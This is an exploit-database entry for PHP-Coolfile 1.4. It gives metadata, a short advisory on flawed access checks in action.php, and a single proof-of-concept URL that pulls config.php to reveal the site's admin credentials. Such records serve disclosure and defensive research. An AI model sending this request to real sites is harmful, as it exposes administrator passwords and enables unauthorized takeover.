PHP-Coolfile 1.4 - Unauthorized Administrative Access

Author: r00t@rsteam.ru
type: webapps
platform: php
port: 
date_added: 2003-11-11 
date_updated: 2012-12-13 
verified: 1 
codes: OSVDB-2809 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9018/info

PHP-Coolfile allows unauthorized administrative access due to an error in the way access is evaluated in the action.php file. This could allow a remote user to obtain the administrative username and password for the site.

www.site.com/php-coolfile/action.php?action=edit&file=config.php